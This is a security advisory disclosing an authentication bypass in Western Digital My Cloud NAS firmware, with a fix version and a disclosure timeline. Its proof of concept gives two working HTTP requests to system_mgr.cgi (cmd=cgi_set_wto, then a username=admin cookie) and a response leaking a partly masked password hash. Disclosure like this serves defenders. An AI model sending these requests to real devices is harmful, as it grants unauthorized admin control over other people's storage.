------------------------------------------------------------------------
Authentication bypass vulnerability in Western Digital My Cloud allows
escalation to admin privileges
------------------------------------------------------------------------
Remco Vermeulen, April 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Western Digital My Cloud is affected by an
authentication bypass vulnerability. An unauthenticated attacker can
exploit this vulnerability to authenticate as an admin user without
needing to provide a password, thereby gaining full control of the My
Cloud device.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This vulnerability was successfully verified on a Western Digital My
Cloud model WDBCTL0020HWT running firmware version 2.21.126. This issue
is not limited to the model that was used to find this vulnerability
since most of the products in the My Cloud series share the same
(vulnerable) code.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was fixed in firmware version 2.30.165.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20170404/authentication_bypass_vulnerability_in_western_digital_my_cloud_allows_escalation_to_admin_privileges.html

Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.

It was found that it is possible for an unauthenticated attacker to create a valid session without requiring to log in. The system_mgr.cgi CGI module contains a command called cgi_set_wto that starts an admin session that is tied to the IP address of the user making the request. Subsequent invocation of commands that would normally require admin privileges are now authorized if an attacker sets the username=admin cookie.
Proof of concept

The following steps can be used to exploit this issue. First, establish an admin session tied to the IP of the requester:

POST /cgi-bin/system_mgr.cgi HTTP/1.1
Host: ***.***.***.***
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
   
cmd=cgi_set_wto

Next, call an endpoint (e.g., cgi_get_ssh_pw_status) that requires admin privileges and authenticate as admin by adding the cookie username=admin.

POST /cgi-bin/system_mgr.cgi HTTP/1.1
Host: ***.***.***.***
Cookie: username=admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
   
cmd=cgi_get_ssh_pw_status

The Western Digital My Cloud device will now respond as follows, indicating success:

HTTP/1.1 200 OK
Date: Sat, 01 Jan 2000 00:18:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/xml
Content-Language: en
Content-Length: 113
   
<?xml version="1.0" encoding="UTF-8"?><ssh><info>sshd:$1$$CoERg7ynjYLsj2j4****.:14746:0:99999:7:::
</info></ssh><Paste>


Timeline

- 09 April 2017: Discovered vulnerability.
- 10 April 2017: Reported to Western Digital customer support.
- 10 April 2017: Response from Western Digital that the vulnerability has been forwarded to their vulnerability assessment team.
- 12 April 2017: Fix released in firmware 2.30.165. However, no response from Western Digital.